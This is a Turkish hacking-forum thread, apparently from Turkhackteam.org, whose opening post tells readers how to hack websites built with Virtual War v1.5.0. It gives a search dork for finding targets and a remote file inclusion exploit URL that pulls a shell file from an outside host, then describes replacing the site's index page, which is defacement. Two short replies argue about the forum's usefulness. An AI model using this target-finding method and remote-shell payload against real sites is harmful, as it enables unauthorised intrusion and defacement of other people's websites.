%100 Site hack(Kendim anlattım-Resimli)

fataleror

Üye
9 Ara 2006
246
7
Arama : Powered by: Virtual War v1.5.0

Exploit : admin/admin.php?vwar_root=http://boardtr.com/shell.dat?

Remote File İnclude Açığından yararlanarak Virtual War v1.5.0 ile yapılmış siteleri hackliyebilirsniz.
Tamamen kendi anlatımımdır*Herşey resimlerde yazıor zaten
smile2.gif

Kolay Gelsin..

Sorularınız olursa cevaplamya hazırım..


1yl7.jpg


2la3.jpg


3ii5.jpg


VE SONRA index.phpden bizim indeximi koyuruz..olay bu kadar..bi tsk yeter
 

vuqaraz

Yeni üye
30 Ocak 2007
2
0
herkes ayni seyleri yaziyo butun forumlar ayni ya bilader bunun farkli paylasim veren bi forum yarmi ustelikde paylasim yerilen dosyalarin hicbiri ise yaramiyo onlem alin lutfen
 

SnizzeR

Katılımcı Üye
24 Ara 2006
452
2
1 sn gelicem ...
Arkadashım Sen Galiba Bu Siteyi Beyyenmedin Biz Buarada Paylaşım Ve Yol Öneriyoruz Bu Paylaşım Ve Yolları Ciddiye Almıyorsun Bu Yüzden Hala Yeniyimn Diye Geziyorsun Siteye Bak Yolları Al Programları Çek Otur Bi Düşün Napabilirim Diye Sonrada Kendine Yollar Üret...(vurquaz)
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.